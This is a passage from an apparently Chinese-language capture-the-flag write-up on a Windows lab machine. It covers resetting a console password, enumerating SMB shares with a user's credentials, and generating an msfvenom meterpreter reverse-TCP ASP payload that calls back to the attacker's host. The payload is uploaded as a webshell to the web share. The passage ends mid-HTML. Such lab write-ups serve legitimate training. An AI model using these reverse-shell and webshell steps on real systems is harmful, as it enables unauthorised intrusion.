src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408133114607\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6211\u524d\u9762\u53ef\u6ca1\u6284\u55f7\uff01\u8bfb\u4e66\u4eba\u7684\u4e8b\u600e\u4e48\u80fd\u53eb\u6284\u5462\u3002<\/p>\n<p>\u6211\u771ftm\u725b\u903c\uff0c\u518d\u6539\u4e00\u4e0b\u53e6\u4e00\u4e2a\uff0c\u8fd9\u6b21\u6211\u4e00\u6b65\u4e00\u622a\u56fe\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007904.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007904.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408133344847\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h4>\u7b2c\u4e00\u6b65<\/h4>\n<p>\u5148\u6309<code>\u7a7a\u683c\u53f3\u8fb9\u7684ctrl+del<\/code><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007905.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007905.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408133402185\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h4>\u7b2c\u4e8c\u6b65<\/h4>\n<p>\u6309<code>esc<\/code>\u4e24\u6b21\uff0c\u754c\u9762\u53d8\u4e86\u5c31\u4e0d\u7528\u6309\u4e86\uff0c\u4e00\u76f4\u6ca1\u53d8\u7684\u8bdd\u70b9\u51fb\u4e00\u4e0b\u90a3\u4e2a\u5c4f\u5e55\u518d\u6309<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007906.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007906.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408133503536\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u518d\u6309<code>esc<\/code>:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007907.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007907.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408133533133\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h4>\u7b2c\u4e09\u6b65<\/h4>\n<p>\u6211\u4eec\u8981\u6539\u7b2c\u4e09\u4e2a\u5c1d\u8bd5\u4f7f\u7528<code>tab<\/code>\u5230\u90a3\u91cc\uff0c\u7136\u540e\u5148<code>esc<\/code>\u518d<code>enter<\/code><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007908.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007908.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408133643795\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8f93\u5165\u5bc6\u7801\uff1a<code>SuperPassword<\/code>\uff0c\u7136\u540e\u5148<code>esc<\/code>\u518d<code>enter<\/code>\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007910.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007910.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408133843912\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8001\u6837\u5b50<code>esc<\/code> +<code>enter<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007911.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007911.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408133916989\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u5168\u90e8\u8f93\u5165<code>SuperPassword<\/code>\uff0c\u8f93\u5165\u5b8c\u4e00\u884c<code>tab<\/code>\u4e00\u4e0b\uff0c\u6700\u540e<code>enter<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007912.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007912.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408133916989\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u989d\uff0c\u96be\u9053\u5199\u9519\u4e86\uff1f\u518d<code>esc + enter<\/code>\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007913.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007913.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408134312732\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fd9\u4e0b\u5bf9\u80c3\u4e86\uff01<code>esc+enter<\/code>\u5c1d\u8bd5\u4e00\u4e0b\u80fd\u5426\u770b\u5230\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007914.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007914.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408134521411\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>ok\u4e86\uff01\u9614\u4ee5\u7ee7\u7eed\u505a\u4e86\uff01<\/p>\n<h3>\u7ee7\u7eedSMB<\/h3>\n<p>\u6839\u636e\u63d0\u53d6\u5230\u7684\u4fe1\u606f\u8fdb\u884c\u64cd\u4f5c\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Simple]\n\u2514\u2500# smbclient -L \/\/172.20.10.4\/WEB -U marcos\nPassword for [WORKGROUP\\marcos]:\n\n        Sharename       Type      Comment\n        ---------       ----      -------\n        ADMIN$          Disk      Admin remota\n        C$              Disk      Recurso predeterminado\n        IPC$            IPC       IPC remota\n        LOGS            Disk      \n        WEB             Disk      \nReconnecting with SMB1 for workgroup listing.\ndo_connect: Connection to 172.20.10.4 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)\nUnable to connect with SMB1 -- no workgroup available\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Simple]\n\u2514\u2500# smbclient \/\/172.20.10.4\/WEB -U marcos \nPassword for [WORKGROUP\\marcos]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\n  .                                   D        0  Sun Oct  8 11:14:24 2023\n  ..                                  D        0  Sun Oct  8 11:14:24 2023\n  03-comming-soon                     D        0  Sun Oct  8 17:22:15 2023\n  aspnet_client                       D        0  Sun Oct  8 15:46:18 2023\n  common-js                           D        0  Sun Oct  8 17:14:09 2023\n  fonts                               D        0  Sun Oct  8 17:14:09 2023\n  images                              D        0  Sun Oct  8 17:14:09 2023\n  index.html                          A     1481  Sun Oct  8 17:26:47 2023\n\n                12966143 blocks of size 4096. 11127775 blocks available\nsmb: \\&gt;<\/code><\/pre>\n<p>\u53ef\u4ee5\u770b\u5230\u662f\u6211\u4eec\u7684web\u76ee\u5f55\u4e86\uff0c\u5c1d\u8bd5\u4e0a\u4f20webshell\u8fdb\u884c\u8bbf\u95ee\uff0c\u56e0\u4e3a\u662fIIS\u670d\u52a1\u5668\uff0c\u5c1d\u8bd5\u4e0a\u4f20ASPX\u6216\u8005ASP\u7684webshell\uff01\u9614\u4ee5\u4f7f\u7528kali\u81ea\u5e26\u7684\uff0c\u4e5f\u53ef\u4ee5\u4f7f\u7528msf\u751f\u6210\u4e00\u4e2a\uff01<\/p>\n<p>\u6211\u4eec\u53c2\u8003<a href=\"https:\/\/book.hacktricks.xyz\/generic-methodologies-and-resources\/shells\/msfvenom#reverse-shell-4\">hacktricks<\/a>\u5907\u5fd8\u5f55\u751f\u6210\u4e00\u4e2a\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007915.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007915.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408140236795\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Simple]\n\u2514\u2500# msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=172.20.10.8 LPORT=1234 -f asp &gt;reverse.asp\n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x86 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 354 bytes\nFinal size of asp file: 37996 bytes\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Simple]\n\u2514\u2500# ls              \n20231008.log  reverse.asp  user.txt\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Simple]\n\u2514\u2500# smbclient \/\/172.20.10.4\/WEB -U marcos \nPassword for [WORKGROUP\\marcos]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; put reverse.asp \nputting file reverse.asp as \\reverse.asp (340.4 kb\/s) (average 340.4 kb\/s)<\/code><\/pre>\n<p>\u672c\u5730\u8bbe\u7f6e\u76d1\u542c\u4ee5\u540e\uff0c\u8bbf\u95ee\u8fdb\u884c\u6fc0\u6d3b\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007916.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007916.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408140621335\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>shell\u4e5f\u6ca1\u6709\u5f39\u56de\u6765\u3002\u3002\u3002\u3002<\/p>\n<p>\u8bd5\u8bd5aspx\uff0c\u5fd8\u4e86\u7248\u672c\u6bd4\u8f83\u65b0\u4e86\uff0c\u4f30\u8ba1\u662faspx\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007917.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007917.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408141121346\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u9614\u4ee5\u8bbf\u95ee\u4e86\uff0c\u4f46\u662f\u6ca1\u6709\u5f39\u56de\u6765\uff1f\uff1f\uff1f<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007918.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007918.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408141141514\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4ece\u7f51\u4e0a\u627e\u4e86\u4e00\u4e2a\u518d\u8bd5\u4e00\u4e0b\uff0c\u4e0d\u884c\u7684\u8bdd\u518d\u60f3\u522b\u7684\u65b9\u6cd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007919.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007919.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408141238201\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007920.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007920.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408141621840\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007921.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007921.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408141542823\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u8bbf\u95ee\u4e00\u4e0b\uff0c\u4e0d\u884c\u5f97\u53e6\u60f3\u522b\u7684\u65b9\u6cd5\u4e86\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007922.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007922.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408141831254\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u989d\uff0c\u884c\u5427\u3002\u3002\u3002\u518d\u627e\u4e00\u4e0b\uff0c\u5148\u8bd5\u63a2\u4e00\u4e0baspx\u5230\u5e95\u53ef\u4e0d\u53ef\u4ee5\u4f20\u5427\uff1a<\/p>\n<pre><code class=\"language-aspx\">&lt;%@ Page Language=&quot;C#&quot; AutoEventWireup=&quot;true&quot;   Inherits=&quot;System.Web.UI.Page&quot; %&gt;\n&lt;%@ Import Namespace=&quot;System&quot; %&gt;\n\n&lt;script runat=&quot;server&quot;&gt;\n    protected void Page_Load(object sender, EventArgs e)\n    {\n        Response.Write(Hello());\n    }\n    private string Hello()\n    {\n        return &quot;Hello World&quot;;\n    }\n&lt;\/script&gt;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007923.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007923.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240408145615633\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u989d\uff0c\u539f\u6765\u662f\u6267\u884c\u4e0d\u4e86\u554a\uff0c\u884c\u5427\uff0c\u597d\u5c34\u5c2c\uff0c\u54c8\u54c8\u54c8<\/p>\n<p>\u6211\u4eec\u76f4\u63a5\u4f7f\u7528\u90a3\u4e2aWindows\u8fdb\u884c\u5427\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007924.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 